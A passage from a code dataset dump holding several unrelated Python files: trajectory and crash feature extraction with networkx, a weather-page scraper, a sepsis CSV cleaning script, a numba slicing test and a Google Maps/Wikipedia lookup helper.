defaultdict(list)\n l3l1_events = defaultdict(list)\n l2l3_events = defaultdict(list)\n l3l2_events = defaultdict(list)\n\n mov_event_entropy = defaultdict(list)\n\n for m0m1, imn in imn_list.items():\n if imn is None:\n continue\n # print(m0m1, imn.keys())\n # print(json.dumps(clear_tuples4json(imn), default=agenda_converter))\n nbr_locations.append(imn['n_locs'])\n nbr_movements.append(imn['n_movs'])\n nbr_reg_locations.append(imn['n_reg_locs'])\n nbr_reg_movements.append(imn['n_reg_movs'])\n radius_of_gyration.append(imn['rg'])\n regular_radius_of_gyration.append(imn['rrg'])\n entropy.append(imn['entropy'])\n rentropy.append(imn['rentropy'])\n avg_mov_length.append(imn['avg_mov_length'])\n std_mov_length.append(imn['std_mov_length'])\n avg_mov_duration.append(string2timedelta(imn['avg_mov_duration']).total_seconds())\n std_mov_duration.append(string2timedelta(imn['std_mov_duration']).total_seconds())\n avg_reg_mov_length.append(imn['avg_reg_mov_length'])\n std_reg_mov_length.append(imn['std_reg_mov_length'])\n avg_reg_mov_duration.append(string2timedelta(imn['avg_reg_mov_duration']).total_seconds())\n std_reg_mov_duration.append(string2timedelta(imn['std_reg_mov_duration']).total_seconds())\n\n graph = imn['graph']\n if not isinstance(graph, nx.DiGraph):\n graph = json_graph.node_link_graph(imn['graph'], directed=True, multigraph=False,\n attrs={'link': 'edges', 'source': 'from', 'target': 'to'})\n density.append(nx.density(graph))\n triangles.append(np.mean(list(nx.triangles(nx.to_undirected(graph)).values())))\n clustering_coefficient.append(nx.average_clustering(graph))\n degree.append(np.mean(list(dict(nx.to_undirected(graph).degree()).values())))\n indegree.append(np.mean(list(dict(graph.in_degree()).values())))\n outdegree.append(np.mean(list(dict(graph.out_degree()).values())))\n if nx.is_connected(nx.to_undirected(graph)):\n diameter.append(nx.diameter(nx.to_undirected(graph)))\n eccentricity.append(np.mean(list(nx.eccentricity(nx.to_undirected(graph)).values())))\n assortativity.append(nx.degree_assortativity_coefficient(nx.to_undirected(graph)))\n else:\n Gc = max(nx.connected_component_subgraphs(nx.to_undirected(graph)), key=len)\n diameter.append(nx.diameter(Gc))\n eccentricity.append(np.mean(list(nx.eccentricity(Gc).values())))\n assortativity.append(nx.degree_assortativity_coefficient(Gc))\n\n # print(imn['location_features'].keys())\n # print(list(imn['location_features'].keys())[0], type(list(imn['location_features'].keys())[0]))\n if isinstance(list(imn['location_features'].keys())[0], int):\n l1, l2, l3 = 0, 1, 2\n else:\n l1, l2, l3 = '0', '1', '2'\n\n l1_count.append(imn['location_features'][l1]['loc_support'])\n l2_count.append(imn['location_features'][l2]['loc_support'])\n if l3 in imn['location_features']:\n l3_count.append(imn['location_features'][l3]['loc_support'])\n in_degree = dict(graph.in_degree())\n out_degree = dict(graph.out_degree())\n dcentrality = nx.degree_centrality(graph)\n bcentrality = nx.betweenness_centrality(graph)\n l1_indegree.append(in_degree[0])\n l2_indegree.append(in_degree[1])\n if 2 in in_degree:\n l3_indegree.append(in_degree[2])\n l1_outdegree.append(out_degree[0])\n l2_outdegree.append(out_degree[1])\n if 2 in out_degree:\n l3_outdegree.append(out_degree[2])\n l1_dcentrality.append(dcentrality[0])\n l2_dcentrality.append(dcentrality[1])\n if 2 in dcentrality:\n l3_dcentrality.append(dcentrality[2])\n l1_bcentrality.append(bcentrality[0])\n l2_bcentrality.append(bcentrality[1])\n if 2 in bcentrality:\n l3_bcentrality.append(bcentrality[2])\n\n l1_nbr_events_type = defaultdict(int)\n l2_nbr_events_type = defaultdict(int)\n l3_nbr_events_type = defaultdict(int)\n\n l1l2_nbr_events_type = defaultdict(int)\n l2l1_nbr_events_type = defaultdict(int)\n l1l3_nbr_events_type = defaultdict(int)\n l3l1_nbr_events_type = defaultdict(int)\n l2l3_nbr_events_type = defaultdict(int)\n l3l2_nbr_events_type = defaultdict(int)\n\n mov_event_count = defaultdict(lambda: defaultdict(int))\n\n for tid in imn['traj_location_from_to']:\n for evnt in event_traj2evntlist[tid]:\n if imn['traj_location_from_to'][tid][1] == 0:\n l1_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][1] == 1:\n l2_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][1] == 2:\n l3_nbr_events_type[evnt['event_type']] += 1\n\n if imn['traj_location_from_to'][tid][0] == 0 and imn['traj_location_from_to'][tid][1] == 1:\n l1l2_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][0] == 1 and imn['traj_location_from_to'][tid][1] == 0:\n l2l1_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][0] == 0 and imn['traj_location_from_to'][tid][1] == 2:\n l1l3_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][0] == 2 and imn['traj_location_from_to'][tid][1] == 0:\n l3l1_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][0] == 1 and imn['traj_location_from_to'][tid][1] == 2:\n l2l3_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][0] == 2 and imn['traj_location_from_to'][tid][1] == 1:\n l3l2_nbr_events_type[evnt['event_type']] += 1\n\n lft = imn['traj_location_from_to'][tid][1]\n mov_event_count[evnt['event_type']][lft] += 1\n\n for event_type in ['Q', 'B', 'A', 'C', 'stop', 'start']:\n if event_type in l1_nbr_events_type:\n l1_events[event_type].append(l1_nbr_events_type[event_type])\n else:\n l1_events[event_type].append(0)\n if event_type in l2_nbr_events_type:\n l2_events[event_type].append(l2_nbr_events_type[event_type])\n else:\n l2_events[event_type].append(0)\n if event_type in l3_nbr_events_type:\n l3_events[event_type].append(l3_nbr_events_type[event_type])\n else:\n l3_events[event_type].append(0)\n\n if event_type in l1l2_nbr_events_type:\n l1l2_events[event_type].append(l1l2_nbr_events_type[event_type])\n else:\n l1l2_events[event_type].append(0)\n if event_type in l2l1_nbr_events_type:\n l2l1_events[event_type].append(l2l1_nbr_events_type[event_type])\n else:\n l2l1_events[event_type].append(0)\n\n if event_type in l1l3_nbr_events_type:\n l1l3_events[event_type].append(l1l3_nbr_events_type[event_type])\n else:\n l1l3_events[event_type].append(0)\n if event_type in l3l1_nbr_events_type:\n l3l1_events[event_type].append(l3l1_nbr_events_type[event_type])\n else:\n l3l1_events[event_type].append(0)\n\n if event_type in l2l3_nbr_events_type:\n l2l3_events[event_type].append(l2l3_nbr_events_type[event_type])\n else:\n l2l3_events[event_type].append(0)\n if event_type in l3l1_nbr_events_type:\n l3l2_events[event_type].append(l3l2_nbr_events_type[event_type])\n else:\n l3l2_events[event_type].append(0)\n\n if event_type in mov_event_count:\n vals = list(mov_event_count[event_type].values())\n mov_event_entropy[event_type].append(calculate_entropy(vals, classes=len(vals)))\n else:\n mov_event_entropy[event_type].append(0.0)\n\n l1l2_count.append(imn['location_nextlocs'][l1].get(l2, 0))\n l2l1_count.append(imn['location_nextlocs'][l2].get(l1, 0))\n l1l3_count.append(imn['location_nextlocs'][l1].get(l3, 0))\n if '2' in imn['location_nextlocs']:\n l3l1_count.append(imn['location_nextlocs'][l3].get(l1, 0))\n l2l3_count.append(imn['location_nextlocs'][l2].get(l3, 0))\n l3l2_count.append(imn['location_nextlocs'][l3].get(l2, 0))\n else:\n l3l1_count.append(0)\n l2l3_count.append(0)\n l3l2_count.append(0)\n edge_betweenness = nx.edge_betweenness(graph)\n l1l2_betweenness.append(edge_betweenness.get((0, 1), 0))\n l2l1_betweenness.append(edge_betweenness.get((1, 0), 0))\n l1l3_betweenness.append(edge_betweenness.get((0, 2), 0))\n l3l1_betweenness.append(edge_betweenness.get((2, 0), 0))\n l2l3_betweenness.append(edge_betweenness.get((1, 2), 0))\n l3l2_betweenness.append(edge_betweenness.get((2, 1), 0))\n\n imn_temporal_features = get_imn_temporal_features(imn_list)\n\n features = {\n 'nbr_locations': np.mean(nbr_locations),\n 'nbr_movements': np.mean(nbr_movements),\n 'nbr_reg_locations': np.mean(nbr_reg_locations),\n 'nbr_reg_movements': np.mean(nbr_reg_movements),\n 'radius_of_gyration': np.mean(radius_of_gyration),\n 'regular_radius_of_gyration': np.mean(regular_radius_of_gyration),\n 'entropy': np.mean(entropy),\n 'rentropy': np.mean(rentropy),\n 'avg_mov_length': np.mean(avg_mov_length),\n 'std_mov_length': np.mean(std_mov_length),\n 'avg_mov_duration': np.mean(avg_mov_duration),\n 'std_mov_duration': np.mean(std_mov_duration),\n # 'avg_reg_mov_length': np.mean(avg_reg_mov_length),\n # 'std_reg_mov_length': np.mean(std_reg_mov_length),\n 'avg_reg_mov_duration': np.mean(avg_reg_mov_duration),\n 'std_reg_mov_duration': np.mean(std_reg_mov_duration),\n\n 'density': np.mean(density),\n 'triangles': np.mean(triangles),\n 'clustering_coefficient': np.mean(clustering_coefficient),\n 'avg_degree': np.mean(degree),\n 'avg_indegree': np.mean(indegree),\n 'avg_outdegree': np.mean(outdegree),\n 'diameter': np.mean(diameter),\n 'eccentricity': np.mean(eccentricity),\n 'assortativity': np.mean(assortativity),\n\n 'l1_count': np.mean(l1_count),\n 'l2_count': np.mean(l2_count),\n 'l3_count': np.mean(l3_count),\n 'l1_indegree': np.mean(l1_indegree),\n 'l2_indegree': np.mean(l2_indegree),\n 'l3_indegree': np.mean(l3_indegree),\n 'l1_outdegree': np.mean(l1_outdegree),\n 'l2_outdegree': np.mean(l2_outdegree),\n 'l3_outdegree': np.mean(l3_outdegree),\n 'l1_dcentrality': np.mean(l1_dcentrality),\n 'l2_dcentrality': np.mean(l2_dcentrality),\n 'l3_dcentrality': np.mean(l3_dcentrality),\n 'l1_bcentrality': np.mean(l1_bcentrality),\n 'l2_bcentrality': np.mean(l2_bcentrality),\n 'l3_bcentrality': np.mean(l3_bcentrality),\n\n 'l1l2_count': np.mean(l1l2_count),\n 'l2l1_count': np.mean(l2l1_count),\n 'l1l3_count': np.mean(l1l3_count),\n 'l3l1_count': np.mean(l3l1_count),\n 'l2l3_count': np.mean(l2l3_count),\n 'l3l2_count': np.mean(l3l2_count),\n 'l1l2_betweenness': np.mean(l1l2_betweenness),\n 'l2l1_betweenness': np.mean(l2l1_betweenness),\n 'l1l3_betweenness': np.mean(l1l3_betweenness),\n 'l3l1_betweenness': np.mean(l3l1_betweenness),\n 'l2l3_betweenness': np.mean(l2l3_betweenness),\n 'l3l2_betweenness': np.mean(l3l2_betweenness),\n }\n\n features.update(imn_temporal_features)\n\n for event_type in ['Q', 'B', 'A', 'C', 'stop', 'start']:\n features['l1_%s' % event_type] = np.mean(l1_events[event_type])\n features['l2_%s' % event_type] = np.mean(l2_events[event_type])\n features['l3_%s' % event_type] = np.mean(l3_events[event_type])\n features['l1l2_%s' % event_type] = np.mean(l1l2_events[event_type])\n features['l2l1_%s' % event_type] = np.mean(l2l1_events[event_type])\n features['l1l3_%s' % event_type] = np.mean(l1l3_events[event_type])\n features['l3l1_%s' % event_type] = np.mean(l3l1_events[event_type])\n features['l2l3_%s' % event_type] = np.mean(l2l3_events[event_type])\n features['l3l2_%s' % event_type] = np.mean(l3l2_events[event_type])\n features['mov_entropy_%s' % event_type] = np.mean(mov_event_entropy[event_type])\n\n for k, v in features.items():\n if np.isnan(v):\n features[k] = -1\n\n return features\n\n\ndef path_in_tree(tree, path, max_depth=16):\n idx = 0\n node = tree\n while True:\n if node['is_leaf'] or idx == len(path) or (max_depth is not None and node['depth'] >= max_depth):\n break\n code = path[idx]\n # print(idx, code)\n if code not in node:\n # print('path not found')\n break\n node = node[code]\n idx += 1\n\n return path[:idx]\n\n\ndef get_collective_features(trajectories, imn_list, quadtree, quadtree_features):\n\n features_path_count = defaultdict(int)\n for traj in trajectories.values():\n paths_of_this_traj = set()\n for i, point in enumerate(traj.object):\n lon, lat, _ = point\n path = lon_lat_to_quadtree_path(lon, lat, depth=16)\n if path not in paths_of_this_traj:\n features_path_count[path] += 1\n paths_of_this_traj.add(path)\n\n is_regular_path = {path: False for path in features_path_count}\n for m0m1, imn in imn_list.items():\n if imn is None:\n continue\n if len(imn['regular_locations']) > 0:\n for lid in imn['regular_locations']:\n if isinstance(list(imn['location_prototype'].keys())[0], str):\n lid = str(lid)\n lon, lat = imn['location_prototype'][lid]\n path = lon_lat_to_quadtree_path(lon, lat, depth=16)\n is_regular_path[path] = True\n\n for mid, movement_traj in imn['movement_traj'].items():\n lft = movement_traj[0]\n if lft[0] in imn['regular_locations'] and lft[1] in imn['regular_locations']:\n if isinstance(imn['movement_prototype'][mid], dict):\n traj_object = imn['movement_prototype'][mid]['object']\n else:\n traj_object = imn['movement_prototype'][mid].object\n for i, point in enumerate(traj_object):\n lon, lat, _ = point\n path = lon_lat_to_quadtree_path(lon, lat, depth=16)\n is_regular_path[path] = True\n\n aggregated_quadtree_features_reg = dict()\n aggregated_quadtree_features_irrreg = dict()\n aggregated_quadtree_features_reg_count = dict()\n aggregated_quadtree_features_irrreg_count = dict()\n for path in features_path_count:\n if path not in quadtree_features:\n continue\n apath = path_in_tree(quadtree, path, max_depth=16)\n if is_regular_path[path]:\n if apath not in aggregated_quadtree_features_reg:\n aggregated_quadtree_features_reg[apath] = quadtree_features[path]\n aggregated_quadtree_features_reg_count[apath] = features_path_count[path]\n else:\n for k, v in quadtree_features[path].items():\n aggregated_quadtree_features_reg[apath][k] += v\n aggregated_quadtree_features_reg_count[apath] += features_path_count[path]\n else:\n if apath not in aggregated_quadtree_features_irrreg:\n aggregated_quadtree_features_irrreg[apath] = quadtree_features[path]\n aggregated_quadtree_features_irrreg_count[apath] = features_path_count[path]\n else:\n for k, v in quadtree_features[path].items():\n aggregated_quadtree_features_irrreg[apath][k] += v\n aggregated_quadtree_features_irrreg_count[apath] += features_path_count[path]\n\n aggregated_quadtree_features_reg_comb = dict()\n aggregated_quadtree_features_irrreg_comb = dict()\n for aqf, aqfc in zip([aggregated_quadtree_features_reg, aggregated_quadtree_features_irrreg],\n [aggregated_quadtree_features_reg_comb, aggregated_quadtree_features_irrreg_comb]):\n for path in aqf:\n aqfc[path] = {\n 'nbr_traj_start': aqf[path]['nbr_traj_start'],\n 'nbr_traj_stop': aqf[path]['nbr_traj_stop'],\n 'nbr_traj_move': aqf[path]['nbr_traj_move'],\n 'avg_traj_speed': aqf[path]['traj_speed_count'] / aqf[path]['traj_speed_count']\n if aqf[path]['traj_speed_count'] > 0 else 0,\n 'nbr_evnt_A': aqf[path]['nbr_evnt_A'],\n 'nbr_evnt_B': aqf[path]['nbr_evnt_B'],\n 'nbr_evnt_C': aqf[path]['nbr_evnt_C'],\n 'nbr_evnt_Q': aqf[path]['nbr_evnt_Q'],\n 'nbr_evnt_start': aqf[path]['nbr_evnt_start'],\n 'nbr_evnt_stop': aqf[path]['nbr_evnt_stop'],\n 'avg_speed_A': aqf[path]['speed_A_sum'] / aqf[path]['nbr_evnt_A'] if aqf[path]['nbr_evnt_A'] > 0 else 0,\n 'avg_max_acc_A': aqf[path]['max_acc_A_sum'] / aqf[path]['nbr_evnt_A'] if aqf[path]['nbr_evnt_A'] > 0 else 0,\n 'avg_avg_acc_A': aqf[path]['avg_acc_A_sum'] / aqf[path]['nbr_evnt_A'] if aqf[path]['nbr_evnt_A'] > 0 else 0,\n 'avg_speed_B': aqf[path]['speed_B_sum'] / aqf[path]['nbr_evnt_B'] if aqf[path]['nbr_evnt_B'] > 0 else 0,\n 'avg_max_acc_B': aqf[path]['max_acc_B_sum'] / aqf[path]['nbr_evnt_B'] if aqf[path]['nbr_evnt_B'] > 0 else 0,\n 'avg_avg_acc_B': aqf[path]['avg_acc_B_sum'] / aqf[path]['nbr_evnt_B'] if aqf[path]['nbr_evnt_B'] > 0 else 0,\n 'avg_speed_C': aqf[path]['speed_C_sum'] / aqf[path]['nbr_evnt_C'] if aqf[path]['nbr_evnt_C'] > 0 else 0,\n 'avg_max_acc_C': aqf[path]['max_acc_C_sum'] / aqf[path]['nbr_evnt_C'] if aqf[path]['nbr_evnt_C'] > 0 else 0,\n 'avg_avg_acc_C': aqf[path]['avg_acc_C_sum'] / aqf[path]['nbr_evnt_C'] if aqf[path]['nbr_evnt_C'] > 0 else 0,\n 'avg_speed_Q': aqf[path]['speed_Q_sum'] / aqf[path]['nbr_evnt_Q'] if aqf[path]['nbr_evnt_Q'] > 0 else 0,\n 'avg_max_acc_Q': aqf[path]['max_acc_Q_sum'] / aqf[path]['nbr_evnt_Q'] if aqf[path]['nbr_evnt_Q'] > 0 else 0,\n 'avg_avg_acc_Q': aqf[path]['avg_acc_Q_sum'] / aqf[path]['nbr_evnt_Q'] if aqf[path]['nbr_evnt_Q'] > 0 else 0,\n 'nbr_crash': aqf[path]['nbr_crash'],\n }\n aggregated_quadtree_features_reg = aggregated_quadtree_features_reg_comb\n aggregated_quadtree_features_irrreg = aggregated_quadtree_features_irrreg_comb\n\n features = defaultdict(float)\n total_reg = np.sum(list(aggregated_quadtree_features_reg_count.values()))\n for path, values in aggregated_quadtree_features_reg.items():\n count = aggregated_quadtree_features_reg_count[path]\n for k, v in values.items():\n if total_reg > 0:\n features['reg_%s' % k] += v * count / total_reg\n else:\n features['reg_%s' % k] += 0\n total_occ = np.sum(list(aggregated_quadtree_features_irrreg_count.values()))\n for path, values in aggregated_quadtree_features_irrreg.items():\n count = aggregated_quadtree_features_irrreg_count[path]\n for k, v in values.items():\n if total_occ > 0:\n features['occ_%s' % k] += v * count / total_occ\n else:\n features['occ_%s' % k] += 0\n\n return features\n\n\ndef extract_features_data(uid, data, quadtree, quadtree_features):\n\n features = dict()\n for index, values in data.items():\n trajectories = values['trajectories']\n events = values['events']\n imn_list = values['imns']\n event_traj2evntlist = defaultdict(list)\n for eid, evnt in events.items():\n event_traj2evntlist[evnt['tid']].append(evnt)\n\n if len(trajectories) == 0:\n continue\n\n traj_features = get_trjectory_features(trajectories)\n evnt_features = get_events_features(events)\n imn_features = get_imn_features(imn_list, event_traj2evntlist)\n collective_features = get_collective_features(trajectories, imn_list, quadtree, quadtree_features[index])\n\n features[index] = {\n 'uid': uid,\n 'crash': values['crash'],\n }\n\n features[index].update(traj_features)\n features[index].update(evnt_features)\n features[index].update(imn_features)\n features[index].update(collective_features)\n\n return features\n\n\ndef extract_features(uid, tr_data, ts_data, quadtree, tr_quadtree_features, ts_quadtree_features):\n # print('train')\n training = extract_features_data(uid, tr_data, quadtree, tr_quadtree_features)\n # print('test')\n test = extract_features_data(uid, ts_data, quadtree, ts_quadtree_features)\n return training, test\n\n\ndef store_features(filename, store_obj):\n json_str = '%s\\n' % json.dumps(store_obj, cls=NumpyEncoder)\n json_bytes = json_str.encode('utf-8')\n # print(json_str)\n with gzip.GzipFile(filename, 'a') as fout:\n fout.write(json_bytes)\n\n\n# def main():\n# area = sys.argv[1]\n# country = 'uk' if area == 'london' else 'italy'\n#\n# path = './'\n# path_dataset = path + 'dataset/'\n# path_imn = path + 'imn/'\n# path_crash = path + 'crash/'\n#\n# crash_users_filename = path_dataset + '%s_users_list.csv' % area\n# nocrash_users_filename = path_dataset + '%s_nocrash_users_list.csv' % area\n#\n# crash_users_list = sorted(pd.read_csv(crash_users_filename).values[:, 0].tolist())\n# nocrash_users_list = sorted(pd.read_csv(nocrash_users_filename).values[:, 0].tolist())\n#\n#\n#\n# if __name__ == \"__main__\":\n# main()\n","sub_path":"code/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":44140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"25435205","text":"API_MAPPINGS = {\n\n \"dummy_get\": {\n \"params\": ['p1', 'p2'],\n \"API_method\": ['GET'],\n \"third_party_url\": \"http://0.0.0.0:8080/test_get1\",\n \"output_format\": \"JSON\"\n },\n\n \"dummy_post\": {\n \"params\": [\"p1\", \"p2\"],\n \"API_method\": ['POST'],\n \"third_party_url\": \"http://0.0.0.0:8080/test_post1\",\n \"output_format\": \"JSON\",\n }\n\n}\n","sub_path":"Non Unified URLs/Architecture_one/app/v2/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"312382294","text":"# I decided to beat the exercise from the workbook!\n\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\npage = requests.get(\"https://forecast.weather.gov/MapClick.php?lat=37.777120000000025&lon=-122.41963999999996#.X9DVpBakolQ\")\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n# first filtering we do over
because it suits our needs\nall_data = soup.findAll('div', class_=\"tombstone-container\")\n\n# lists for storage\nperiod_names = []\nshort_descriptions = []\ntemperatures = []\n\n# fill them with data :)\nfor data in all_data:\n period_names.append(data.find('p', class_='period-name').get_text(separator=' '))\n short_descriptions.append(data.find('p', class_='short-desc').get_text(separator=' ')) \n temperatures.append(data.find('p', class_='temp').get_text())\n\n# let's zip them into touples!\ndata_touples = zip(period_names, short_descriptions, temperatures)\n\n# and create a nice data frame :)\nweather_data = pd.DataFrame(data_touples, columns=['period-name', 'short-desc', 'temp'])\n\n\n#################################\n# and with dedication for Wojtek:\ndef to_celsius(fahrenheit):\n i_fahr = int(fahrenheit)\n d_cels = round((i_fahr - 32) * 5/9, 1)\n return str(d_cels)\n\n\ntemperatures_c = []\nfor t in temperatures:\n t_splitted = t.split()\n t_splitted[1] = to_celsius(t_splitted[1])\n t_splitted[2] = t_splitted[2].replace('F', 'C')\n t_joined = \" \".join(t_splitted)\n temperatures_c.append(t_joined)\n\ndata_touples = zip(period_names, short_descriptions, temperatures_c)\nweather_data_c = pd.DataFrame(data_touples, columns=['period-name', 'short-desc', 'temp'])\n\n\nprint(weather_data)\nprint()\nprint(weather_data_c)","sub_path":"1. Python/06. Pandas/ex1_cell17_v3 (2).py","file_name":"ex1_cell17_v3 (2).py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"180032241","text":"import numpy as np, pandas as pd\r\nimport os\r\nimport csv\r\n\r\ndir_str= r'E:\\Python\\PycharmProjects\\MScProject\\TrainingA_Sepsis0-1.csv'\r\n\r\ncsv1 = pd.read_csv(dir_str)\r\ncsv1.drop(\"DBP\",axis=1,inplace=True)\r\n\r\ncsv1[\"HR\"] = np.where(csv1[\"HR\"] >= 200, 200, csv1[\"HR\"])\r\ncsv1[\"HR\"] = np.where(csv1[\"HR\"] <= 30, 30, csv1[\"HR\"])\r\n\r\ncsv1[\"Temp\"] = np.where(csv1[\"Temp\"] >= 42, 42, csv1[\"Temp\"])\r\ncsv1[\"Temp\"] = np.where(csv1[\"Temp\"] <= 35, 35, csv1[\"Temp\"])\r\n\r\ncsv1[\"O2Sat\"] = np.where(csv1[\"O2Sat\"] <= 70, 70, csv1[\"O2Sat\"])\r\n\r\ncsv1[\"SBP\"] = np.where(csv1[\"SBP\"] <= 80, 80, csv1[\"SBP\"])\r\n\r\ncsv1[\"Resp\"] = np.where(csv1[\"Resp\"] <= 10, 10, csv1[\"Resp\"])\r\ncsv1[\"Resp\"] = np.where(csv1[\"Resp\"] >= 24, 24, csv1[\"Resp\"])\r\n\r\nform = \"{0:.02f}\".format\r\n\r\ncsv1 = csv1.applymap(form)\r\n\r\n\r\ncsv1.to_csv('A.csv',index=False) #index False的意思是不生成序列\r\n","sub_path":"TrainingA_sepsis0-1_Continue.py","file_name":"TrainingA_sepsis0-1_Continue.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"529262203","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function, division, absolute_import\n\nimport numpy as np\nfrom numba import autojit\n\n@autojit\ndef slicing_error(X, window_size, i):\n return X[max(0, i - window_size):i + 1]\n\ndef test_slicing_shape():\n\n X = np.random.normal(0, 1, (20, 2))\n\n i = 0\n gold = slicing_error.py_func(X, 10, i)\n ans = slicing_error(X, 10, i)\n\n assert gold.shape == ans.shape, (gold.shape, ans.shape)\n\nif __name__ == '__main__':\n test_slicing_shape()\n","sub_path":"oldnumba/tests/issues/test_issue_77.py","file_name":"test_issue_77.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"437916748","text":"# coding: utf-8\nimport re\nimport googlemaps\nimport wikipedia\n\n\"\"\" Parser class in charge of parse string in\nlist of words \"\"\"\nclass Parser:\n\n\tdef __init__(self, search, stopwords):\n\t\tself.user_search_list = []\n\t\tself.user_search = search\n\t\tself.stopwords = set(stopwords)\n\n\t\"\"\" Get the string type by the user, lowered it,\n\tthen substract all special character from it and replace\n\tit by ' ', split it by ' '. Then we remove from the list\n\tall the empty string '' to have only words. We compare this list\n\twith the stopwords list and return the difference \"\"\"\n\t@property\n\tdef parsing_words(self):\n\t\tself.user_search = self.user_search.lower()\n\t\tself.user_search_list = re.sub(\n\t\t\tr'\\W+', ' ', self.user_search)\n\t\tself.user_search_list = self.user_search_list.split(' ')\n\t\tfor i, value in enumerate(\n\t\t\tself.user_search_list):\n\t\t\tif value == '':\n\t\t\t\tdel self.user_search_list[i]\n\t\tparsing = [x for x in self.user_search_list if x not in self.stopwords]\n\t\treturn parsing\n\n\"\"\" Gmap class in charge of getting and retrun googlemaps\nand wikipedia API value \"\"\"\nclass Gmap:\n\n\tdef __init__(self, user_query, gm_api_id):\n\t\tself.user_query = user_query\n\t\tself.request = \"\"\n\t\tself.gmap = googlemaps.Client(\n\t\t\tkey=gm_api_id)\n\n\t\"\"\" This method return the value from the googlemap API\n\tand wikipedia API to the /_get_user_value route \"\"\"\n\tdef gmaps_main(self):\n\t\tif not self.request:\n\t\t\tself.user_query2str()\n\t\tif self.request:\n\t\t\twiki = (False, False)\n\t\t\tname = []\n\t\t\tcoordinates = []\n\t\t\taddress = False\n\t\t\t\"\"\" Get the geocode of Paris to have a \n\t\t\tposition for the places google map request \"\"\"\n\t\t\tgeocode = self.request_geocode(\"Paris\")\n\t\t\tif geocode:\n\t\t\t\t\"\"\" If we have a geocode back, get the places\n\t\t\t\tfrom google map service \"\"\"\n\t\t\t\tplaces = self.request_places(self.request, \n\t\t\t\t\t\t\tlocation=geocode)\n\t\t\t\tif places:\n\t\t\t\t\t\"\"\" If we have place, the ask the wikipedia API\n\t\t\t\t\tto search with the place name found by google.\n\t\t\t\t\tThen take the name and these coordinates \"\"\"\n\t\t\t\t\twiki = self.request_wiki(places[0].keys())\n\t\t\t\t\tfor place in places:\n\t\t\t\t\t\tfor key, value in place.items():\n\t\t\t\t\t\t\tname.append(key)\n\t\t\t\t\t\t\tcoordinates.append(value)\n\t\t\t\t\tif coordinates:\n\t\t\t\t\t\t\"\"\" If we get coordinates, get the address of the\n\t\t\t\t\t\tplace by using reverse geocode google map service with\n\t\t\t\t\t\tplaces coordinates found before \"\"\"\n\t\t\t\t\t\treverse_geocode = self.gmap.reverse_geocode(coordinates[0])\n\t\t\t\t\t\tif reverse_geocode:\n\t\t\t\t\t\t\taddress = reverse_geocode[0][\"formatted_address\"]\n\t\t\treturn name, coordinates, wiki, address\n\t\telse:\n\t\t\treturn False, False, (False, False), False\n\n\t\"\"\" This method get a list and return a string\n\tto be used with Gmaps and Wikipedia API\"\"\"\n\tdef user_query2str(self):\n\t\tif self.user_query:\n\t\t\tfor i, place in enumerate(self.user_query):\n\t\t\t\tif i < len(self.user_query) - 1:\n\t\t\t\t\tself.request += place + \" \"\n\t\t\t\telse:\n\t\t\t\t\tself.request += place\n\n\t\"\"\" This method send to the Gmaps API\n\ta geocode request and return coordinates\n\tto the gmaps_main method to be use as\n\tlocation argument for the request_places\n\tmethod \"\"\"\n\tdef request_geocode(self, request):\n\t\tgeocode = self.gmap.geocode(\n\t\t\trequest, language=\"fr\")\n\t\tif geocode:\n\t\t\tgeometry = geocode[0]['geometry']\n\t\t\tlocation = geometry['location']\n\t\t\treturn location\n\t\telse:\n\t\t\treturn False\n\n\t\"\"\" This method send to the Gmaps API a places\n\trequest and return a dictionnary to the gmaps_main\n\tmethod \"\"\"\n\tdef request_places(self, request, location):\n\t\tlocation_list = []\n\t\ttry:\n\t\t\tplaces = self.gmap.places(\n\t\t\t\trequest, location=location,\n\t\t\t\tradius=5000)\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\t\treturn False\n\t\tif places['status'] == \"OK\":\n\t\t\tfor place in places['results']:\n\t\t\t\tplaces_dictionary = {}\n\t\t\t\tname = place['name']\n\t\t\t\tgeometry = place['geometry']\n\t\t\t\tlocation = geometry['location']\n\t\t\t\tplaces_dictionary[name] = location\n\t\t\t\tlocation_list.append(places_dictionary)\n\t\t\treturn location_list\n\t\telse:\n\t\t\treturn False\n\n\t\"\"\" This method send to the Wikipedia API \n\ta request with the name extract from the\n\tdictionnary returned by the places request.\n\tIf there is many results, we get the first\n\tresult in the queue, then we get the summary\n\tand the HTTP address of the page which is returned\n\tto the gmap_main method \"\"\"\n\tdef request_wiki(self, request):\n\t\twikipedia.set_lang(\"fr\")\n\t\ttry:\n\t\t\twiki_search = wikipedia.search(request)\n\t\texcept wikipedia.exceptions.DisambiguationError as e:\n\t\t\twiki_search = e.options[0]\n\t\tif wiki_search:\n\t\t\tname = wiki_search[0]\n\t\t\twiki_summary = wikipedia.summary(name)\n\t\t\twiki_page = wikipedia.page(name)\n\t\t\ttry:\n\t\t\t\twiki_url = wiki_page.url\n\t\t\texcept:\n\t\t\t\twiki_image = False\n\t\t\treturn(wiki_summary, wiki_url)\n\t\telse:\n\t\t\treturn (False, 